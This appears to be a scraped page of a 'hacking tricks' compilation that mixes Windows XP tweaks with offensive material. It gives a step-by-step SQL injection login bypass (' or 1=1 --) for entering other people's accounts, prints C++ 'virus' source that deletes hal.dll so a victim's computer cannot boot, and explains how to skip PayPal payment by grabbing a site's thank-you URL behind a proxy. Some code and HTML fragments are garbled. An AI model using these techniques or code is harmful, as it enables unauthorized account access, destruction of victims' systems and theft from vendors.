You are on page 1of 6

Hacking Websites

If you posses the HTML & JAVA knowledge then u can even access password protected
websites.

To hack a Password Protected Websites just follow these steps: -

* Open the website u want to hack. Provide wrong username-password.


(e.g : Username - me and Password - ' or 1=1 --)
An error occured saying wrong username-password. Now be prepared
your work starts from here...

* Right click anywhere on that page =>> go to view source.

* There u can see the html coding with javascripts.


* Before this login information copy the url
of the site in which you are.

* Then delete the java script from the above that validates your
information in the server.(Do this very carefully, your success to
hack the site depends upon this i.e. how efficiently u delete the
JavaScript’s that validate your account information)

then look for...code ..: input name="password" type="password"


=> replace
there instead of . See there if
max length of password is less than 11 then increase it to 11
(e.g. : if then write

* Just go to file => save as and save it any where within


the hard disk with ext.html(e.g. :c:hack.htm)

* Close your webpage and go to the webpage u save in your


hard disk(e.g : c:hack.htm) Open it.

* U see that some changes in current page as compared to original


One. Don't worry.

* Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]

Congrats! Your have cracked the above website and entered into the
account of Ist user saved in the server's database.

The above trick doesn't work on the websites using latest


technique to protect there servers
Make a Shortcut to Lock Your Computer

Leaving your computer in a hurry but you don?t want to log off? You can double-click a
shortcut on your desktop to quickly lock the keyboard and display without using
CTRL+ALT+DEL or a screen saver.

To create a shortcut on your desktop to lock your computer:

Right-click the desktop.


Point to New, and then click Shortcut.

The Create Shortcut Wizard opens. In the text box, type the following:
rundll32.exe user32.dll,LockWorkStation

Click Next.

Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name
you like.

Click Finish.

You can also change the shortcut's icon (my personal favorite is the padlock icon in
shell32.dll).

To change the icon:

Right click the shortcut and then select Properties.


Click the Shortcut tab, and then click the Change Icon button.

In the Look for icons in this file text box, type:


Shell32.dll.

Click OK.

Select one of the icons from the list and then click OK

You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you
only one keystroke from the normal command, but it could be more convenient.
Powerful C++ Virus

This is a powerful C++ virus, which deletes Hal.dll, something that is required for
startup. After deleting that, it shuts down, never to start again.
Warning: Do not try this on your home computer.

The Original Code: Code: #include


#include using namespace std; int main(int argc, char *argv[])
{
std::remove(”C:\\windows\\system32\\hal.dll”); //PWNAGE TIME
system(”shutdown -s -r”);
system(”PAUSE”);
return EXIT_SUCCESS;
}
A more advanced version of this virus which makes the C:\Windows a variable that
cannot be wrong. Here it is:
Code: #include
#include using namespace std; int main(int argc, char *argv[])
{
std::remove(”%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(”shutdown -s -r”);
system(”PAUSE”);
return EXIT_SUCCESS;
}
The second version would be more useful during times when you do not know the
victims default drive. It might be drive N: for all you know.
Download from a paypal site without paying a penny

Just a little basic html tip for those who are trying to download an application from sites
which has an paypal order page & link to start you off.

Use a proxy when you try this to hide your ip as some sites will record your ip when you
connect for security.

1) Rightclick your mouse (ctrl+click) viewsource and open the source of the site in an a
texteditor
2) Search for the word "return"
3) Next to it you can find the url for the thank you page
4) Copy the url and paste it in your browser and you will see the download link

This works only if you can download instantly after payment, it will not work if the link
needs to be emailed to you.

You can try it here to start with:


Code:
http://www.ramphelp.com/halfpipe.html

About half way down the page you will find:

Copy the link into your browser and download.\


CONTROL PANEL ON THE DESKTOP.xp

On The Desktop, Right Click Your Mouse Then Choose "New | Folder". Name The
Folder As "ControlPanel. {21EC2020-3AEA-1069-A2DD-08002B30309D}" Without
The "Quote Things. And Now You Can Access The Control Panel More Faster Then
Before

REMOVING USERNAME IN THE STARTMENU


xp
Open Registry Editor Then Go To :
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Expl
orer".
On The Right, Make A New Entry With Right Click On Your Mouse Then Choose "New
| DWORD Value" Change The Entry's Name Into "NoUserNameInStartMenu", Double
Click In The New Entry And Fill The "Value Data" With "1". Press OK, Exit From The
Registry Editor. Restart Your Computer.

DRIVE ICONS.xp

To set the icon of any drive (hard disk, cd rom or anything else) with a letter (C:\ etc.),
run REGEDIT (Start -> Run -> regedit)
Navigate to:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore
r
If one doesn't already exist, create a new KEY called "DriveIcons". Under this key, create
a new key with the letter of your drive. I.e. C for your C:\ drive.
To change the icon for that drive, create a key inside that one called DefaultIcon and set
the path of (Default) to the location of your icon
eg C\DefaultIcon\ then (Default) = D:\Documents\C Drive Icon.ico
To change the name of that drive, create a key in the drive letter one (eg C\) called
DefaultLabel and set the (Default) to what you want the drive to be called. This is useful
if you want to assign a long name to the floppy drive.

LOCKING COMPUTERS.

To lock a computer in XP, as you probably know, you press "L" while holding down
"Windows Logo" key on your keyboard. However, if you would like to lock a computer
remotely, for example via "Remote Administrator", you don't have this ability. What you
can do instead, is to create a shortcut on remote computer's desktop where Target
%windir%\System32\rundll32.exe user32.dll,LockWorkStation Start In %windir%
AUTO DELETE TEMPORARY FOLDER.xp

First go into gpedit.msc


Next select -> Computer Configuration/Administrative Templates/Windows
Components/Terminal Services/Temporary Folder
Then right click "Do Not Delete Temp Folder Upon Exit"
Go to properties and hit disable. Now next time Windows puts a temp file in that folder it
will automatically delete it when its done! Note from Forum Admin: Remember,
GPEDIT (Group Policy Editor) is only available in XP Pro.

SHUTDOWN XP FASTER 1.xp


Like previous versions of windows, it takes long time to restart or shutdown windows xp
when the "Exit Windows" sound is enabled. to solve this problem you
must disable this useless sound. click start button then go to settings -> control panel ->
Sound,Speech and Audio devices -> Sounds and Audio Devices -> Sounds, then under
program events and windows menu click on "Exit Windows" sub-menu and highlight
it.now from sounds you can select,choose "none" and then click apply and ok. now you
can see some improvements when shutting down your system.

SHUTDOWN XP FASTER 2.xp


Start Regedit.
Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.
Click on the "Control" Folder.
Select "WaitToKillServiceTimeout"
Right click on it and select Modify.
Set it a value lower than 2000 (Mine is set to 200).

You might also like